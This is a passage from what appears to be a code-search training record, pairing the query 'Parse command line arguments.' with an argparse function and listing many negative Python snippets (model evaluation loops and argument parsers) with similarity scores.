num_tokens)).item()\n curr_result = {'macro_perplexity': macro_perplexity,\n 'micro_perplexity': micro_perplexity}\n\n if len(results.keys()) == 0:\n for k, v in curr_result.items():\n results[k] = [v]\n else:\n for k, v in curr_result.items():\n results[k].append(v)\n\n # Log metrics\n output_eval_file = os.path.join(args.output_dir, 'results_{}_{}.txt'.format(task_name, split))\n with open(output_eval_file, 'a') as writer:\n logger.info('***** Eval results *****')\n writer.write('STEP: {:s}\\n'.format(str(step)))\n for key in sorted(curr_result.keys()):\n logger.info(' %s = %s', key, str(curr_result[key]))\n writer.write('%s = %s\\n' % (key, str(curr_result[key])))\n\n # Log predictions\n if 'gen' not in task_name:\n output_pred_file = \\\n os.path.join(args.output_dir, 'predictions_{}_{}_{}.lst'.format(task_name, split, step))\n with open(output_pred_file, 'w') as writer:\n logger.info('***** Write predictions *****')\n for pred in preds:\n writer.write('{}\\n'.format(processor.get_labels()[pred]))\n\n # Maintain a single metrics file\n if os.path.exists(args.output_dir):\n with open(os.path.join(args.output_dir, 'metrics_{}_{}.json'.format(task_name, split)), 'w') as f:\n f.write(json.dumps(results))\n f.close()\n\n # Report mean dev loss\n mean_eval_loss = eval_loss / len(eval_dataloader)\n logging.info('\\n' + '*' * 10)\n logging.info('Mean development loss: {:.4f}'.format(mean_eval_loss))\n logging.info('*' * 10 + '\\n')\n\n return results, mean_eval_loss, preds, soft_preds", "def execute_module(self):\n raise NotImplementedError", "def test(self):\n self.eval()", "def check_norm_state(modules, train_state):\n for mod in modules:\n if isinstance(mod, _BatchNorm):\n if mod.training != train_state:\n return False\n return True", "def __modules_recurse(self, mod=None):\n if mod is None:\n mod = self\n for module in mod.children():\n if isinstance(module, (nn.ModuleList, nn.Sequential, self.custom_layers)):\n yield from self.__modules_recurse(module)\n else:\n yield module", "def test(eval_loader, model, criterion, epoch, device, config, tf_writer, prepare_embeddings_fn, embedder):\n\n model.eval() # eval mode disables dropout\n\n losses = AverageMeter() # cross entropy loss\n accs = AverageMeter() # accuracies\n\n # Batches\n for _, data in enumerate(eval_loader):\n\n # Perform embedding + padding\n embeddings, labels = prepare_embeddings_fn(data, embedder, device, config)\n\n # Forward prop.\n output = model(embeddings)\n\n # Perform regularization on embedding weights -- not all models support this\n if config.model.use_regularization == \"none\":\n loss = criterion(output[\"logits\"].to(device), labels)\n elif config.model.use_regularization == \"l1\":\n # Regularization on embedding weights\n emb_weights_norm = torch.norm(model.emb_weights, p=1)\n # Loss\n loss = criterion(output[\"logits\"].to(device), labels) + config.model.regularization_lambda * emb_weights_norm # scalar\n else:\n raise NotImplementedError(\"Regularization other than 'none' or 'l1' not supported\")\n\n # Find accuracy\n _, predictions = output[\"logits\"].max(dim=1) # (n_documents)\n correct_predictions = torch.eq(predictions, labels).sum().item()\n accuracy = correct_predictions / labels.size(0)\n\n # Keep track of metrics\n losses.update(loss.item(), labels.size(0))\n accs.update(accuracy, labels.size(0))\n \n try:\n for sentence in data:\n sentence.clear_embeddings()\n except:\n pass\n\n # Print eval status\n print('Evaluation:\\t'\n 'Eval Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Eval Accuracy 
{acc.val:.3f} ({acc.avg:.3f})'.format(loss=losses, acc=accs), flush=True)\n\n # Log the running loss, accuracy\n tf_writer.add_scalar('test loss (avg. epoch)', losses.avg, epoch)\n tf_writer.add_scalar('test accuracy (avg. epoch)', accs.avg, epoch)", "def run(self, task):\n params = self.params\n\n # task parameters\n self.task = task\n params.out_features = N_CLASSES[task]\n self.is_classif = task != 'STS-B'\n\n # load data\n self.data = self.load_data(task)\n if not self.data['dico'] == self._embedder.dico:\n raise Exception((\"Dictionary in evaluation data (%i words) seems different than the one \" +\n \"in the pretrained model (%i words). Please verify you used the same dictionary, \" +\n \"and the same values for max_vocab and min_count.\") % (len(self.data['dico']), len(self._embedder.dico)))\n\n # embedder\n self.embedder = copy.deepcopy(self._embedder)\n self.embedder.npu()\n\n # projection layer\n self.proj = nn.Sequential(*[\n nn.Dropout(params.dropout),\n nn.Linear(self.embedder.out_dim, params.out_features)\n ]).npu()\n\n # optimizers\n self.optimizer_e = get_optimizer(list(self.embedder.get_parameters(params.finetune_layers)), params.optimizer_e)\n self.optimizer_p = get_optimizer(self.proj.parameters(), params.optimizer_p)\n\n # train and evaluate the model\n for epoch in range(params.n_epochs):\n\n # update epoch\n self.epoch = epoch\n\n # training\n logger.info(\"GLUE - %s - Training epoch %i ...\" % (task, epoch))\n self.train()\n\n # evaluation\n logger.info(\"GLUE - %s - Evaluating epoch %i ...\" % (task, epoch))\n with torch.no_grad():\n scores = self.eval('valid')\n self.scores.update(scores)\n self.eval('test')", "def test_one_epoch_model(self, model: nn.Module) -> Tuple[float, Dict[str, float]]:\n losses = []\n l1_criterion = nn.L1Loss()\n model.eval()\n\n # testloaders contain same length(iteration) of batch dataset\n for sample_batched in progressbar(self.testloader, prefix=\"[Test]\\t\"):\n image = torch.autograd.Variable(sample_batched['image'].cuda())\n depth = torch.autograd.Variable(sample_batched['depth'].cuda(non_blocking=True))\n maxDepth = 1000.0\n depth_n = maxDepth/depth\n #No use self.criterion \n\n output = self.model(image)\n # Compute the loss\n\n l_depth = l1_criterion(output, depth_n)\n\n l_ssim = torch.clamp((1 - ssim(output, depth_n, val_range = 1000.0 / 10.0)) * 0.5, 0, 1)\n\n loss = (1.0 * l_ssim) + (0.1 * l_depth)\n\n \n\n if self.half:\n images = images.half()\n\n # forward + backward + optimize\n \n self._count_correct_prediction(output, depth_n)\n losses.append(loss.item())\n\n avg_loss = sum(losses) / len(losses)\n acc = self._get_epoch_acc(is_test=True)\n return avg_loss, acc\n\n # # testloaders contain same length(iteration) of batch dataset\n # for data in progressbar(self.testloader, prefix=\"[Test]\\t\"):\n # images, labels = data[0].to(self.device), data[1].to(self.device)\n\n # if self.half:\n # images = images.half()\n\n # # forward + backward + optimize\n # loss, outputs = self.criterion(model, images=images, labels=labels)\n # self._count_correct_prediction(outputs, labels)\n # losses.append(loss.item())\n\n # avg_loss = sum(losses) / len(losses)\n # acc = self._get_epoch_acc(is_test=True)\n # return avg_loss, acc", "def eval_net(net, loader, device):\n net.eval()\n mask_type = torch.float32 if net.n_classes == 1 else torch.long\n n_val = len(loader) # the number of batch\n tot = 0\n\n with tqdm(total=n_val, desc='Validation round', unit='batch', leave=False) as pbar:\n for batch in loader:\n imgs, true_masks = batch['image'], 
batch['mask']\n imgs = imgs.to(device=device, dtype=torch.float32)\n true_masks = true_masks.to(device=device, dtype=mask_type)\n\n with torch.no_grad():\n mask_pred = net(imgs)\n\n if net.n_classes > 1:\n tot += F.cross_entropy(mask_pred, true_masks.squeeze(1)).item()\n else:\n pred = torch.sigmoid(mask_pred)\n pred = (pred > 0.5).float()\n tot += dice_coeff(pred, true_masks).item()\n pbar.update()\n\n net.train()\n return tot / n_val", "def test_model(net, data_loader):\n net.eval()\n true_preds, count = 0.0, 0\n for imgs, labels in data_loader:\n imgs, labels = imgs.to(device), labels.to(device)\n with torch.no_grad():\n preds = net(imgs).argmax(dim=-1)\n true_preds += (preds == labels).sum().item()\n count += labels.shape[0]\n test_acc = true_preds / count\n return test_acc", "def eval(self, *args, **kwargs):\n raise NotImplementedError" ]
[ "0.7058148", "0.6562479", "0.6410497", "0.6410497", "0.64048153", "0.6211592", "0.61744463", "0.6138237", "0.60468954", "0.5828812", "0.5767713", "0.57668567", "0.57438034", "0.57431364", "0.57200557", "0.5707766", "0.5693356", "0.56603515", "0.56447244", "0.5637777", "0.5625589", "0.5547203", "0.5526483", "0.55137634", "0.549431", "0.546889", "0.5460552", "0.5458127", "0.5451793", "0.5448735", "0.5448328", "0.54453087", "0.54364383", "0.54276294", "0.5421578", "0.5412491", "0.5355198", "0.5347941", "0.5343304", "0.534144", "0.53411007", "0.53256416", "0.53176266", "0.530643", "0.5294836", "0.52945286", "0.52882427", "0.52854043", "0.5281059", "0.52461004", "0.52358115", "0.52356344", "0.52325636", "0.5225295", "0.52174795", "0.52155054", "0.5211494", "0.5211375", "0.52052885", "0.52005357", "0.5182883", "0.5176481", "0.5173727", "0.5173297", "0.516498", "0.51589084", "0.5151062", "0.51437837", "0.51364905", "0.51348716", "0.5128271", "0.5126886", "0.5124652", "0.51224613", "0.5114541", "0.5102453", "0.5099635", "0.50957644", "0.50909233", "0.5088713", "0.5085543", "0.50852567", "0.5083463", "0.506926", "0.50657624", "0.50654393", "0.5057001", "0.50565845", "0.5051687", "0.5046366", "0.50408566", "0.50355613", "0.5035323", "0.5031733", "0.5026579", "0.5019157", "0.5015733", "0.50137246", "0.50129265", "0.50113785", "0.5002266" ]
0.0
-1
Parse command line arguments.
def parse_args():
    parser = argparse.ArgumentParser(description="Hyper parameter")
    parser.add_argument(
        "--model", help="Model to use", default="All", type=str)
    return parser.parse_args()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse_arguments(args):", "def parse_command_line(self, argv):\n from optparse import OptionParser\n usage = \"usage: %prog [options]\"\n parser = OptionParser(usage)\n\n (options, args) = parser.parse_args(argv)", "def parseArguments(self):\n iterator = iter(sys.argv[1:]) # Skip file name\n for argument in iterator:\n if len(argument) < 2 or argument[:2] != '--':\n self.error('syntax error \"{}\"'.format(argument))\n else:\n def getValueOfArgument(): return next(iterator)\n self.parseArgument(argument[2:], getValueOfArgument)", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"Reads datapacket pcds, interpolates quaternions and generates scans from dataset in config file\")\n parser.add_argument(\"--visualization\", \"-v\", action=\"store_true\", help=\"if generated clouds should be visualized\")\n parser.add_argument(\"--directory\", \"-d\",\n help=\"if only specified directory should be interpolated, e.g. 'fragments/fragment0'\")\n args = parser.parse_args()\n return args.visualization, args.directory", "def parse_arguments(self):\n \n for arg in sys.argv[1:]:\n (key, sep, value) = arg.partition(\"=\")\n if sep != \"=\":\n raise ProcessorError(\"Illegal argument '%s'\" % arg)\n self.update_data(key, value)", "def parse_command_line_arguments():\n\n description, epilog = __doc__.split(\"\\n\\n\", 1)\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=description,\n epilog=epilog)\n\n parser.add_argument('-s', '--s', dest='s', action='store', type=float, required=True,\n help='Minimum frequency')\n parser.add_argument('-c', '--credentials', dest='credentials', action='store',\n default=\"./.tpass\",\n help='File with Twitter credentials (username and password, separated by a space)')\n\n args = parser.parse_args()\n \n return args", "def parse_command_line_arguments(argv):\n print(\"reading command line arguments in...\")\n\n parser = argparse.ArgumentParser(description='Description of your program')\n parser.add_argument('-i', '--input', help='Location of input csv file', required=True)\n parser.add_argument('-p', '--predicting', help='The column name containing the category to predict', required=True)\n parser.add_argument('-s', '--scoring', help='The scoring type to be used with model evaluation', required=False)\n parser.add_argument('-c', '--scale', help='List of column names to scale values for', nargs='+', required=False)\n args = parser.parse_args()\n\n return args.input, args.predicting, args.scoring, args.scale", "def __parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--force', action=\"store_true\", default=False,\n help='overwrite existing database files during import')\n parser.add_argument('-e', '--extension', action=\"store\", default='txt',\n help='specify file extension. default is \"txt\"')\n parser.add_argument('-d', '--delimiter', action=\"store\", default='\\t',\n help='specify column delimiter. default is tab (\\\\t)')\n parser.add_argument('-m', '--mark', action=\"store\", default='.',\n help='specify decimal mark for numeric data. default is'\n ' dot (.)')\n parser.add_argument('-o', '--outformat', action=\"store\", default='npz',\n help='specify output database format. default is \"npz\"'\n ' for numpy database. 
use \"mat\" for matlab '\n ' database format.')\n parser.add_argument('-r', '--recursive', action=\"store_true\", default=False,\n help='recursively walk through all sub-directories of'\n ' current working directory')\n parser.add_argument('-p', '--pcs', action=\"store_true\", default=True,\n help='indicate if files are pcs files.')\n parser.add_argument('-c', '--colheadlines', action=\"store\", default='1',\n help='number of lines spanned by the column headers')\n args = parser.parse_args()\n return args", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('-u', '--urls_dirpath', type=unicode)\n parser.add_argument('-r', '--resources_dir', type=unicode)\n parser.add_argument('-t', '--total_docs', type=int)\n parser.add_argument('-m', '--mapping', type=unicode,\n help='File with the yago to lkif mapping')\n\n return parser.parse_args()", "def __parse_args(self):\n for argument in self.args:\n source_arg = re.match(\"^(--source=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n input_arg = re.match(\"^(--input=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n stats_arg = re.match(\"^(--stats=(([A-Z]|[a-z]|/|_|[0-9]|.)+))$\", argument)\n help_arg = re.match(\"^--help$\", argument)\n vars_arg = re.match(\"^--vars$\", argument)\n insts_arg = re.match(\"^--insts$\", argument)\n if source_arg:\n self.sourceFile = source_arg.group(2)\n self.passedArgs.append(\"source\")\n elif input_arg:\n self.inputFile = input_arg.group(2)\n self.passedArgs.append(\"input\")\n elif help_arg:\n print(\"napoveda\")\n sys.exit(0)\n elif stats_arg:\n self.statsFile = stats_arg.group(2)\n self.passedArgs.append(\"stats\")\n elif vars_arg:\n self.passedArgs.append(\"vars\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"vars\"\n elif insts_arg:\n self.passedArgs.append(\"insts\")\n if self.first_stat_arg is None:\n self.first_stat_arg = \"insts\"\n else:\n raise ArgError(\"Unknown argument or format of the argument! (\" + argument + \")\")", "def parse_arguments():\n parser = argparse.ArgumentParser(prog='AdapterRunner', description='Adapter Runner Application')\n parser.add_argument('-a', '--application', action='store', dest='app_name', help='Application Name',\n metavar='<application_name>')\n parser.add_argument('-fi', '--fetch_interval', action='store', dest='fetch_stats_interval', help='Fetch Stats Interval',\n metavar='<fetch_interval in seconds>')\n return parser.parse_args()", "def _parse_command_line_arguments():\n parser = ArgumentParser(\n description=(\n 'Command-line tool to generate a list of unique from a TS file from FermiFAST'\n ),\n )\n parser.add_argument(\n 'ts-file',\n type=str,\n help=(\n 'A file containing the TS sky map'\n ),\n )\n parser.add_argument('--skiprows',\n type=int,\n help='number of rows to skip at the top (default 0)',\n required=False)\n parser.set_defaults(skiprows=0)\n arguments = vars(parser.parse_args())\n return arguments", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Bandits algorithms on a click-through \"\n \"rate dataset.\")\n parser.add_argument('--plot', action='store_true')\n return parser.parse_args()", "def parse_arguments(args=sys.argv[1:]):\n \n parser = argparse.ArgumentParser()\n \n parser.add_argument('-i', '--input',\n help=\"Path of input file to read. 
Default: {d}\".format(d=INPUT_FILE),\n default=INPUT_FILE)\n \n return parser.parse_args(args)", "def parse_args():\n parser = default_argument_parser()\n parser.add_argument(\"--label-map\",\n dest=\"label_map\",\n type=pathlib.Path,\n help=\"Label map in YAML format which maps from category \"\n \"ID to name.\")\n parser.add_argument(\"--train-csv\",\n dest=\"train_csv\",\n required=True,\n type=pathlib.Path,\n help=\"Path to training data CSV file.\")\n parser.add_argument(\"--valid-csv\",\n dest=\"valid_csv\",\n required=False,\n type=pathlib.Path,\n help=\"Optional path to validation data CSV file.\")\n parser.add_argument(\n \"--image-width\",\n type=int,\n help=\"Image width (optional, used to speed up dataset processing).\")\n parser.add_argument(\n \"--image-height\",\n type=int,\n help=\"Image height (optional, used to speed up dataset processing).\")\n return parser.parse_args()", "def _parse_args(argv):\n parser = make_parser()\n args = parser.parse_args(argv)\n LOGGER.setLevel(to_log_level(args.loglevel))\n\n if not args.inputs:\n if args.list:\n tlist = \", \".join(API.list_types())\n _exit_with_output(\"Supported config types: \" + tlist)\n elif args.env:\n cnf = os.environ.copy()\n _output_result(cnf, args.output, args.otype or \"json\", None, None)\n sys.exit(0)\n else:\n parser.print_usage()\n sys.exit(1)\n\n if args.validate and args.schema is None:\n _exit_with_output(\"--validate option requires --scheme option\", 1)\n\n return args", "def parse_command_line():\r\n\r\n parser = argparse.ArgumentParser(description='User args')\r\n parser.add_argument(\"--action\", choices=['train', 'predict', 'demo', 'test'], required=True, help=\"Choose action.\")\r\n parser.add_argument(\"--model\", choices=['vgg', 'unet', 'fpn'], required=True, help=\"Choose model.\")\r\n parser.add_argument(\"--dataset\", choices=['full', 'small'], required=True, help=\"Choose dataset.\")\r\n\r\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n help_str = \\\n 'The collection folder to sort files into. ' \\\n 'If the folder does not exist, it will be created along with the ' \\\n 'necessary contents.'\n parser.add_argument('-c', '--collection', help=help_str)\n\n help_str = \\\n 'The source folder to import files from. 
Has to exist and ' \\\n 'has to be a folder.'\n parser.add_argument('-s', '--source', help=help_str, required=False)\n\n help_str = \\\n 'View the gallery in random order auto skpping after the' \\\n 'given amount of seconds'\n parser.add_argument('-v', '--view', help=help_str, required=False)\n\n return parser.parse_args()", "def parse_command_line_arguments():\n parser = argparse.ArgumentParser()\n\n # Positional args\n parser.add_argument('data_directory', action=\"store\")\n\n # Optional args\n parser.add_argument('--save_dir', action='store',\n dest='save_dir',\n help='Load categories names from given file',\n default=\"checkpoint.pth\")\n\n parser.add_argument('--gpu', action='store_true',\n dest='device',\n help='Device of prediction processing',\n default=False)\n\n parser.add_argument('--arch', action='store',\n dest='arch',\n help='Name of pre-trained network used for training',\n default=\"vgg11\")\n\n parser.add_argument('--learning_rate', action='store',\n dest='learning_rate',\n help='value of training learning rate',\n default=0.001)\n\n parser.add_argument('--hidden_units', action='store',\n dest='hidden_units',\n help='Number of units in the fully-connected hidden '\n 'layer of the neural netwrork',\n default=512)\n\n parser.add_argument('--epochs', action='store',\n dest='epochs',\n help='Number of training epochs',\n default=5)\n\n # Parse all args\n results = parser.parse_args()\n\n return results", "def parse_cmd_arguments():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('-i', '--input', required=True, help='input JSON file')\n parser.add_argument('-o', '--output', required=True,\n help='ouput JSON file')\n parser.add_argument('-d', '--debug', required=False,\n help='log level. Can be 0-3. Defaults to 0')\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"-threads\", help=\"specifies a thread count for parallel operations\", type=int)\n return parser.parse_args()", "def process_command_line_arguments() -> Namespace:\n\n parser = build_parser()\n arguments = parser.parse_args()\n\n return arguments", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-e\", \"--events\", type=str,\n help=\"path to events CSV-file\")\n parser.add_argument(\"-d\", \"--data\", type=str,\n help=\"path to data CSV-file\")\n parser.add_argument(\"-l\", \"--limit\", nargs='?', type=int, default=None,\n help=\"max records to be processed\")\n parser.add_argument(\"-t\", \"--timezone\", nargs='?', type=int, default=5,\n help=\"date and time shift\")\n parser.add_argument(\"-o\", \"--optimized\", action='store_true',\n help=\"if specified, then data CSV will be processed\"\n \" by small chunks to escape memory issues\")\n parser.add_argument(\"-v\", \"--verbose\", action='store_true')\n parser.add_argument(\"--output-folder\", nargs='?', type=str,\n default=\"linked\")\n return vars(parser.parse_args())", "def parse_args(args=None):\n return AP.parse_args(args=args)", "def parse_args():\n\tparser = argparse.ArgumentParser(description='Show video statistics.')\n\tparser.add_argument('--sort', metavar='FIELD', choices=['views', 'likes', 'dislikes'],\n\t default='views',\n\t help='sort by the specified field. 
Options are views, likes and dislikes.')\n\tparser.add_argument('--max', metavar='MAX', type=int, help='show the top MAX entries only.')\n\tparser.add_argument('--csv', action='store_true', default=False,\n\t help='output the data in CSV format.')\n\tparser.add_argument('--table', action='store_true', default=False,\n\t help='output the data in an ascii table.')\n\tparser.add_argument('--workers', type=int, default=8,\n\t help='number of workers to use, 8 by default.')\n\treturn parser.parse_args()", "def parse_args(args=None):\n\t\treturn _get_args_parser().parse_args(args)", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-d\",\n \"--debug\",\n help=\"Print lots of debugging statements\",\n action=\"store_const\",\n dest=\"loglevel\",\n const=logging.DEBUG,\n default=logging.ERROR,\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"Be verbose\",\n action=\"store_const\",\n dest=\"loglevel\",\n const=logging.INFO,\n )\n parser.add_argument(\"runscript\", default=None)\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('n_iter',\n help='number of iteration',\n type=int)\n parser.add_argument('n_processes',\n help='number of processes',\n type=int)\n parser.add_argument('method',\n help='mutual exclusion method')\n parser.add_argument('duration',\n help='Duration of each process',\n type=float)\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--obs_len\",\n default=20,\n type=int,\n help=\"Directory where the sequences (csv files) are saved\",\n )\n parser.add_argument(\n \"--data_dir\",\n default=\"\",\n type=str,\n help=\"Directory where the sequences (csv files) are saved\",\n )\n parser.add_argument(\n \"--feature_dir\",\n default=\"\",\n type=str,\n help=\"Directory where the computed features are saved\",\n )\n parser.add_argument(\"--mode\",\n required=True,\n type=str,\n help=\"train/val/test/compute_all/lanes_only\")\n parser.add_argument(\n \"--sequence_num\",\n default=-1,\n type=int,\n help=\"Specify a specific sequence to visualize.\",\n )\n parser.add_argument(\n \"--batch_start\",\n default=0,\n type=int,\n help=\"Specify the starting row of features to visualize.\",\n )\n parser.add_argument(\n \"--batch_end\",\n default=-1,\n type=int,\n help=\"Specify the last row to visualize, -1 to visualize till end.\",\n )\n parser.add_argument(\n \"--single_figure\",\n default=False,\n action=\"store_true\",\n help=\"Plot all candidates for a scenein one figure.\",\n )\n return parser.parse_args()", "def argumentsParser(args):\n\targuments = []\n\tif args.find('\"') > -1:\n\t\tt_arguments = args.split('\"')\n\t\tfor a in t_arguments:\n\t\t\tif a == '' or a == ' ':\n\t\t\t\tpass\n\t\t\telif a[-1] == ' ':\n\t\t\t\targuments.append(a[:-1])\n\t\t\telse:\n\t\t\t\targuments.append(a)\n\telif args.find(\"'\") > -1:\n\t\tt_arguments = args.split(\"'\")\n\t\tfor a in t_arguments:\n\t\t\tif a == '' or a == ' ':\n\t\t\t\tpass\n\t\t\telif a[-1] == ' ':\n\t\t\t\targuments.append(a[:-1])\n\t\t\telse:\n\t\t\t\targuments.append(a)\n\telif args == ' ':\n\t\tpass\n\telse:\n\t\targuments = args.split(' ')\n\treturn arguments", "def parse_args():\n parser = argparse.ArgumentParser(description='Google reminders cli',\n epilog=usage,\n formatter_class=argparse.RawTextHelpFormatter)\n return parser.parse_args()", "def parseArgs():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', default='fsod', help='training 
dataset') # use fsod dataset for default\n parser.add_argument('--cfg', dest='cfg_file', required=True, help='optional config file')\n parser.add_argument('--load_ckpt', help='path to load checkpoint')\n parser.add_argument('--load_detectron', help='path to load detectron weight pickle file')\n parser.add_argument('--output_dir', help='output directory to save the testing results.')\n parser.add_argument('--range', help='[start, end)', type=int, nargs=2)\n parser.add_argument('--visualize', dest='visualize', help='output images of detection', action='store_true')\n return parser.parse_args()", "def parse_arguments():\n parser = ArgumentParser()\n\n # For development/testing\n parser.add_argument(\"--dev\", help=\"run the code of the developers tag\")\n\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n # All reference encoders\n parser.add_argument(\"--step\", dest=\"step\", default=\"10\", type=int, help=\"step size\")\n parser.add_argument(\"--repeats\", dest=\"repeats\", type=int, default=1, help=\"repeats\")\n\n parser.add_argument(dest=\"image\", default=None,\n help=\"select the test image to run\")\n\n args = parser.parse_args()\n return args", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"Subscription Watch CSV file packaging script\", prog=sys.argv[0])\n\n # required args\n parser.add_argument(\"-f\", \"--filepath\", required=True,\n help=\"path to files to package\")\n parser.add_argument(\n \"-s\",\n \"--max-size\",\n type=int,\n default=DEFAULT_MAX_SIZE,\n help=f\"Maximum size of packages in MiB. (Default: {DEFAULT_MAX_SIZE} MiB)\",\n )\n parser.add_argument(\n \"-o\", \"--overwrite\", action=\"store_true\", default=False, help=\"whether to overwrite existing files.\"\n )\n parser.add_argument(\"--ocp-cluster-id\", required=True,\n help=\"OCP Cluster ID\")\n parser.add_argument(\"-v\", \"--verbosity\", action=\"count\",\n default=0, help=\"increase verbosity (up to -vvv)\")\n return parser.parse_args()", "def parseArgs():\n parser = argparse.ArgumentParser(description='Runs RHEAS simulation.')\n parser.add_argument('config', help='configuration file')\n parser.add_argument('-d', metavar='DB', help='name of database to connect')\n parser.add_argument('-u', help='update database', action='store_true')\n args = parser.parse_args()\n return args.config, args.d, args.u", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--version',\n metavar=\"<str>\",\n help=\"Input data version number\",\n type=str,\n required=True\n )\n args = parser.parse_args()\n return args", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"\"\"A script to get the kmer frequency\n from csv files with kmer counts from genomes.\"\"\")\n\n parser.add_argument('-sd',\n '--sub_dir',\n type=str,\n dest='sub_dir',\n help='Subdirectory name for output files.') # kmer_count\n\n parser.add_argument('-do',\n '--dir_out',\n type=str,\n dest='dir_out',\n help='directory name for output files.') # Results/kmer_freq\n\n return parser.parse_args()", "def parse_args():\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'config',\n help='Config file')\n parser.add_argument(\n '--quiet',\n '-q',\n action='store_true',\n help='do not print to console'\n )\n parser.add_argument(\n '--password',\n '-p',\n action='store_true',\n help='Set password in keyring.'\n )\n parser.add_argument(\n '--update',\n '-u',\n action='store_true',\n help='Only add transactions after last date in database.'\n 
)\n parser.add_argument(\n '--mark_seen',\n '-m',\n action='store_true',\n help='Mark fetched emails as seen.'\n )\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"CUDAPOA Python API sample program.\")\n parser.add_argument('-m',\n help=\"Run MSA generation. By default consensusis generated.\",\n action='store_true')\n parser.add_argument('-p',\n help=\"Print output MSA or consensus for each POA group.\",\n action='store_true')\n parser.add_argument('-l',\n help=\"Use long or short read sample data.\",\n action='store_true')\n return parser.parse_args()", "def parse_args():\n parser = OptionParser()\n parser.add_option('--data-file', '-f', default='train_data.hdf5',\n help=\"The path to the data file\")\n parser.add_option('--runs-per-epoch', '-r', type='int',\n help=\"The number of runs per epoch (train samples count)\")\n parser.add_option('--avg-window-size', '-w', default='1', type='int',\n help=\"The window size for moving average\")\n\n (options, args) = parser.parse_args()\n return options", "def parse_args(self, argv=None):\n self.opts, self.args = self.cli_parser.parse_args(argv)\n self._begin_logging()\n if argv is None:\n argv = sys.argv\n logger.info(' '.join(argv))\n self._process_input_files()\n self._construct_links_of_interest()\n self._open_output_files()\n data = self._construct_data_struct()\n return data", "def parseArgs(arguments=None):\n\tparser = generateParser(None)\n\treturn parser.parse_known_args(arguments)", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n # Optional Argument\n parser.add_argument('-l', '--length', metavar='length', type=float, default=2, help='length (meter)')\n parser.add_argument('-k', '--conductivity', metavar='conductivity', type=float, default=0.5, help='constant thermal conductivity (W/m.K)')\n parser.add_argument('-q', '--heatgeneration', metavar='heatgeneration', type=float, default=1000, help='uniform heat generation (kW/m^3)')\n parser.add_argument('-TA', '--tempA', metavar='tempA', type=int, default=100, help='temperature at A (Celcius)')\n parser.add_argument('-TB', '--tempB', metavar='tempB', type=int, default=200, help='temperature at A (Celcius)')\n parser.add_argument('-n', '--nodes', metavar='nodes', type=int, default=5, help='nodes (positive integer)')\n parser.add_argument('-A', '--area', metavar='area', type=float, default=1, help='area (m^2)')\n parser.add_argument('-nf', '--nofigure', action='store_true', help='disable figure')\n parser.add_argument('-nd', '--nodetail', action='store_true', help='disable detail')\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(\n description=\"script for downloading and merging log files from S3 for particular time period\")\n parser.add_argument(\"-s\", \n \"--startdate\", \n help=\"start date in format YYYYMMDD\", \n required=True, \n type=valid_date)\n parser.add_argument(\"-e\", \"--enddate\", \n help=\"end date in format YYYYMMDD\", \n required=True, \n type=valid_date)\n parser.add_argument(\"-f\", \n \"--file\", \n help=\"destination file\", \n required=True)\n parser.add_argument( \"-c\", \"--config\",\n default=\"/Users/samarius/.get_analytics_log.config.json\",\n help=\"configuration file path\")\n\n\n try:\n args = parser.parse_args()\n return args\n except Exception as e:\n print \"can't parse command line args: {}\".format(repr(e))\n raise", "def parse_args():\n\n parser = argparse.ArgumentParser(description='Disk metric sender')\n parser.add_argument('-v', 
'--verbose', action='store_true', default=None, help='Verbose?')\n parser.add_argument('--debug', action='store_true', default=None, help='Debug?')\n\n return parser.parse_args()", "def parseArguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--output_folder',\n help='Path of the folder where output files should be written.')\n parser.add_argument('--partition_id',\n help='ID of the computer partition to collect data from.')\n parser.add_argument('--collector_db',\n help='The path of slapos collect database.')\n\n return parser.parse_args()", "def arg_parse():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-f\",\n \"--fpath\",\n type=str,\n required=True,\n help=\"Path to files to generate test data from e.g. /badc/cmip5/data/cmip5/output1/MOHC/HadGEM2-ES/rcp85/mon/atmos/Amon/r1i1p1/latest/tas\",\n )\n\n parser.add_argument(\n \"-t\",\n \"--time_only\",\n default=False,\n help=\"Only generate one time step of this dataset\",\n action=\"store_true\",\n )\n\n parser.add_argument(\n \"-s\",\n \"--step\",\n type=int,\n default=100,\n help=\"Step to select latitude/longitude by. Only relevant when time_only is False\",\n )\n\n parser.add_argument(\n \"-n\",\n \"--number\",\n type=int,\n default=0,\n help=\"Number of files to generate. Default is all files. Only relevant when time_only is False\",\n )\n\n parser.add_argument(\n \"-l\",\n \"--level\",\n type=int,\n default=-1,\n help=\"Number of levels to extract, starting with index 0.\",\n )\n\n parser.add_argument(\n \"-c\", \"--compress\", help=\"Compress the files.\", action=\"store_true\"\n )\n\n return parser.parse_args()", 